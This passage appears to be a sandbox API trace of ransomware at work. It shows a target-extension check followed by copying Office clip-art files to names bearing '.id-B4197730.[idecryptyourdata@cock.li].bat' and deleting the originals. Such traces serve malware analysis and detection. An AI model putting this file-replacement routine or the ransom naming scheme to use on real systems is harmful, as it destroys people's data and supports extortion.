[0199.184] lstrlenW (lpString=".pdf") returned 4 [0199.184] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.184] lstrlenW (lpString=".xls") returned 4 [0199.184] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.184] lstrlenW (lpString=".xlsx") returned 5 [0199.184] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0199.184] lstrlenW (lpString=".ppt") returned 4 [0199.184] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196142.WMF") returned 68 [0199.184] lstrlenW (lpString=".zip") returned 4 [0199.184] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.184] lstrlenW (lpString=".rar") returned 4 [0199.184] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.184] lstrlenW (lpString=".bz2") returned 4 [0199.185] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.185] lstrlenW (lpString=".7z") returned 3 [0199.185] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196142.WMF") returned 68 [0199.185] lstrlenW (lpString=".dbf") returned 4 [0199.185] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196142.WMF") returned 68 [0199.185] lstrlenW (lpString=".1cd") returned 4 [0199.185] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196142.WMF") returned 68 [0199.185] lstrlenW (lpString=".jpg") returned 4 [0199.185] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.185] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.185] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.185] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196354.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196354.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0199.186] GetLastError () returned 0x0 [0199.186] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x3586, lpOverlapped=0x0) returned 1 [0199.323] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x3590, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x3590, lpOverlapped=0x0) returned 1 [0199.324] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.325] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0199.325] SetEndOfFile (hFile=0x390) returned 1 [0199.325] CloseHandle (hObject=0x390) returned 1 [0199.325] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.325] SetEndOfFile (hFile=0x378) returned 1 [0199.326] CloseHandle (hObject=0x378) returned 1 [0199.326] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196354.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.326] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196354.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0196354.wmf")) returned 1 [0199.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196354.WMF") returned 68 [0199.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196354.WMF") returned 68 [0199.327] lstrlenW (lpString=".doc") returned 4 [0199.327] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.327] lstrlenW (lpString=".docx") returned 5 [0199.327] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0199.327] lstrlenW (lpString=".pdf") returned 4 [0199.327] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.327] lstrlenW (lpString=".xls") returned 4 [0199.327] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.327] lstrlenW (lpString=".xlsx") returned 5 [0199.327] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0199.328] lstrlenW (lpString=".ppt") returned 4 [0199.328] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196354.WMF") returned 68 [0199.328] lstrlenW (lpString=".zip") returned 4 [0199.328] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.328] lstrlenW (lpString=".rar") returned 4 [0199.328] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.328] lstrlenW (lpString=".bz2") returned 4 [0199.328] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.328] lstrlenW (lpString=".7z") returned 3 [0199.328] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196354.WMF") returned 68 [0199.328] lstrlenW (lpString=".dbf") returned 4 [0199.328] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196354.WMF") returned 68 [0199.328] lstrlenW (lpString=".1cd") returned 4 [0199.328] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0196354.WMF") returned 68 [0199.328] lstrlenW (lpString=".jpg") returned 4 [0199.328] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.329] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.329] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198113.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198113.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0199.330] GetLastError () returned 0x0 [0199.330] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0xa520, lpOverlapped=0x0) returned 1 [0199.431] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xa530, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xa530, lpOverlapped=0x0) returned 1 [0199.433] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.433] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0199.433] SetEndOfFile (hFile=0x390) returned 1 [0199.433] CloseHandle (hObject=0x390) returned 1 [0199.433] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.433] SetEndOfFile (hFile=0x378) returned 1 [0199.434] CloseHandle (hObject=0x378) returned 1 [0199.434] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198113.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.434] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198113.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198113.wmf")) returned 1 [0199.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198113.WMF") returned 68 [0199.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198113.WMF") returned 68 [0199.435] lstrlenW (lpString=".doc") returned 4 [0199.435] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.435] lstrlenW (lpString=".docx") returned 5 [0199.435] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0199.435] lstrlenW (lpString=".pdf") returned 4 [0199.435] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.435] lstrlenW (lpString=".xls") returned 4 [0199.435] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.435] lstrlenW (lpString=".xlsx") returned 5 [0199.435] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0199.435] lstrlenW (lpString=".ppt") returned 4 [0199.435] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198113.WMF") returned 68 [0199.435] lstrlenW (lpString=".zip") returned 4 [0199.435] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.435] lstrlenW (lpString=".rar") returned 4 [0199.435] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.435] lstrlenW (lpString=".bz2") returned 4 [0199.435] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.435] lstrlenW (lpString=".7z") returned 3 [0199.435] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198113.WMF") returned 68 [0199.435] lstrlenW (lpString=".dbf") returned 4 [0199.436] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198113.WMF") returned 68 [0199.436] lstrlenW (lpString=".1cd") returned 4 [0199.436] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198113.WMF") returned 68 [0199.436] lstrlenW (lpString=".jpg") returned 4 [0199.436] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.436] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.436] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.436] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198234.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198234.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0199.437] GetLastError () returned 0x0 [0199.437] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0xa69e, lpOverlapped=0x0) returned 1 [0199.631] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xa6a0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xa6a0, lpOverlapped=0x0) returned 1 [0199.632] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.632] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0199.632] SetEndOfFile (hFile=0x390) returned 1 [0199.632] CloseHandle (hObject=0x390) returned 1 [0199.632] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.632] SetEndOfFile (hFile=0x378) returned 1 [0199.633] CloseHandle (hObject=0x378) returned 1 [0199.633] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198234.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.634] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198234.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198234.wmf")) returned 1 [0199.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198234.WMF") returned 68 [0199.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198234.WMF") returned 68 [0199.634] lstrlenW (lpString=".doc") returned 4 [0199.634] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.634] lstrlenW (lpString=".docx") returned 5 [0199.634] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0199.634] lstrlenW (lpString=".pdf") returned 4 [0199.634] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.634] lstrlenW (lpString=".xls") returned 4 [0199.634] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.634] lstrlenW (lpString=".xlsx") returned 5 [0199.634] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0199.635] lstrlenW (lpString=".ppt") returned 4 [0199.635] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198234.WMF") returned 68 [0199.635] lstrlenW (lpString=".zip") returned 4 [0199.635] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.635] lstrlenW (lpString=".rar") returned 4 [0199.635] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.635] lstrlenW (lpString=".bz2") returned 4 [0199.635] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.635] lstrlenW (lpString=".7z") returned 3 [0199.635] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198234.WMF") returned 68 [0199.635] lstrlenW (lpString=".dbf") returned 4 [0199.635] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198234.WMF") returned 68 [0199.635] lstrlenW (lpString=".1cd") returned 4 [0199.635] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198234.WMF") returned 68 [0199.635] lstrlenW (lpString=".jpg") returned 4 [0199.635] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.635] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.636] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.636] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198494.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198494.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0199.636] GetLastError () returned 0x0 [0199.636] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0xae08, lpOverlapped=0x0) returned 1 [0199.784] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xae10, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xae10, lpOverlapped=0x0) returned 1 [0199.786] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.786] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0199.786] SetEndOfFile (hFile=0x390) returned 1 [0199.786] CloseHandle (hObject=0x390) returned 1 [0199.786] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.786] SetEndOfFile (hFile=0x378) returned 1 [0199.787] CloseHandle (hObject=0x378) returned 1 [0199.787] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198494.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.788] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198494.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0198494.wmf")) returned 1 [0199.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198494.WMF") returned 68 [0199.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198494.WMF") returned 68 [0199.788] lstrlenW (lpString=".doc") returned 4 [0199.788] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.788] lstrlenW (lpString=".docx") returned 5 [0199.788] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0199.788] lstrlenW (lpString=".pdf") returned 4 [0199.788] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.788] lstrlenW (lpString=".xls") returned 4 [0199.788] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.788] lstrlenW (lpString=".xlsx") returned 5 [0199.788] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0199.788] lstrlenW (lpString=".ppt") returned 4 [0199.788] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198494.WMF") returned 68 [0199.789] lstrlenW (lpString=".zip") returned 4 [0199.789] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.789] lstrlenW (lpString=".rar") returned 4 [0199.789] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.789] lstrlenW (lpString=".bz2") returned 4 [0199.789] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.789] lstrlenW (lpString=".7z") returned 3 [0199.789] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198494.WMF") returned 68 [0199.789] lstrlenW (lpString=".dbf") returned 4 [0199.789] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198494.WMF") returned 68 [0199.789] lstrlenW (lpString=".1cd") returned 4 [0199.789] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0198494.WMF") returned 68 [0199.789] lstrlenW (lpString=".jpg") returned 4 [0199.789] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.789] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.789] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.789] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199307.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199307.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0199.790] GetLastError () returned 0x0 [0199.790] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0xc37e, lpOverlapped=0x0) returned 1 [0199.899] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xc380, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xc380, lpOverlapped=0x0) returned 1 [0199.900] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.900] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0199.900] SetEndOfFile (hFile=0x390) returned 1 [0199.901] CloseHandle (hObject=0x390) returned 1 [0199.901] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.901] SetEndOfFile (hFile=0x378) returned 1 [0199.902] CloseHandle (hObject=0x378) returned 1 [0199.902] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199307.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0199.902] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199307.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199307.wmf")) returned 1 [0199.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199307.WMF") returned 68 [0199.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199307.WMF") returned 68 [0199.903] lstrlenW (lpString=".doc") returned 4 [0199.903] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0199.903] lstrlenW (lpString=".docx") returned 5 [0199.903] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0199.903] lstrlenW (lpString=".pdf") returned 4 [0199.903] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0199.903] lstrlenW (lpString=".xls") returned 4 [0199.903] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0199.903] lstrlenW (lpString=".xlsx") returned 5 [0199.903] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0199.903] lstrlenW (lpString=".ppt") returned 4 [0199.903] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0199.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199307.WMF") returned 68 [0199.903] lstrlenW (lpString=".zip") returned 4 [0199.903] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.903] lstrlenW (lpString=".rar") returned 4 [0199.903] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.903] lstrlenW (lpString=".bz2") returned 4 [0199.903] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0199.903] lstrlenW (lpString=".7z") returned 3 [0199.903] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0199.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199307.WMF") returned 68 [0199.903] lstrlenW (lpString=".dbf") returned 4 [0199.903] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199307.WMF") returned 68 [0199.903] lstrlenW (lpString=".1cd") returned 4 [0199.903] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0199.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199307.WMF") returned 68 [0199.903] lstrlenW (lpString=".jpg") returned 4 [0199.903] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0199.904] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.904] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, 